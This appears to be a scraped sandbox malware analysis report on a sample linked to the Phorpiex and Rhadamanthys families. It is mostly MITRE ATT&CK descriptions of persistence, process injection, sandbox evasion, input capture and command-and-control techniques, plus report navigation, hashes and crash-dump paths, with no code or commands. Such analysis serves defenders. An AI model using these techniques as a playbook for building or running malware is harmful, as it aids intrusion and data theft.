Associated: 0000002F.00000002.3552448433.00007FF7A1F0B000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000002F.00000002.3552766636.00007FF7A2479000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000002F.00000002.3552801299.00007FF7A2482000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000002F.00000002.3552865666.00007FF7A2485000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000002F.00000002.3552900299.00007FF7A2486000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ff7a1ef0000_winupsecvmgr.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fc9e1e80a9e88cbd31d74ff9d33f509eac08cb26dec99584b05bafd3a36954d
Instruction ID: b31157a78bf4b98e921a766a7413f3f702f31aef975b04f292549332e6073292
Opcode Fuzzy Hash: 2fc9e1e80a9e88cbd31d74ff9d33f509eac08cb26dec99584b05bafd3a36954d
Instruction Fuzzy Hash: FCB0123190E20D94F3013F11D84125873E0AB14751FC24030C80C033B2CEFD54408F30

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report f5TWdT5EAc.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Phorpiex

Threatname: Rhadamanthys

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Phishing

Bitcoin Miner

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_2910625892.exe_3bf245b75b14244fde194fd7cd2a0d6f410bda9_61efd67b_4b383156-2409-4b57-a564-4ac380a546fc\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_fontdrvhost.exe_d32c824e8915b30da4efd4eabd13e74e4ef8c1_ad0be647_812698ed-7ee4-4381-b307-05ed556f8341\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2978.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D32.tmp.WERInternalMetadata.xml

Windows Analysis Report
f5TWdT5EAc.exe

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre